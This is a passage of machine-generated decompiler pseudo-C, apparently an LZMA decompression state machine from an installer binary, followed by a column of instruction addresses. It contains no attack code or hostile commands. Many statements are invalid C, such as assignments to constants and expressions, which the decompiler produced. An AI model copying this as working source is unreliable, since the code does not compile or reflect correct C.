												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                0x00406609
                0x00406609
                0x00406609
                0x00406609
                0x0040660f
                0x00406613
                0x00406617
                0x00406621
                0x0040662f
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x0040693c
                0x0040693c
                0x00406940
                0x00000000
                0x00000000
                0x00406942
                0x0040694b
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406963
                0x0040697c
                0x0040697f
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x00406974
                0x00406977
                0x00406977
                0x00406999
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x00406940
                0x00000000
                0x00000000
                0x00000000
                0x0040699b
                0x0040699b
                0x00406914
                0x00406918
                0x00406a50
                0x00406a50
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00406a76
                0x0040691e
                0x00406924
                0x0040692b
                0x00406933
                0x00406933
                0x00406936
                0x00000000
                0x00406936
                0x004069a0
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x004068bc
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
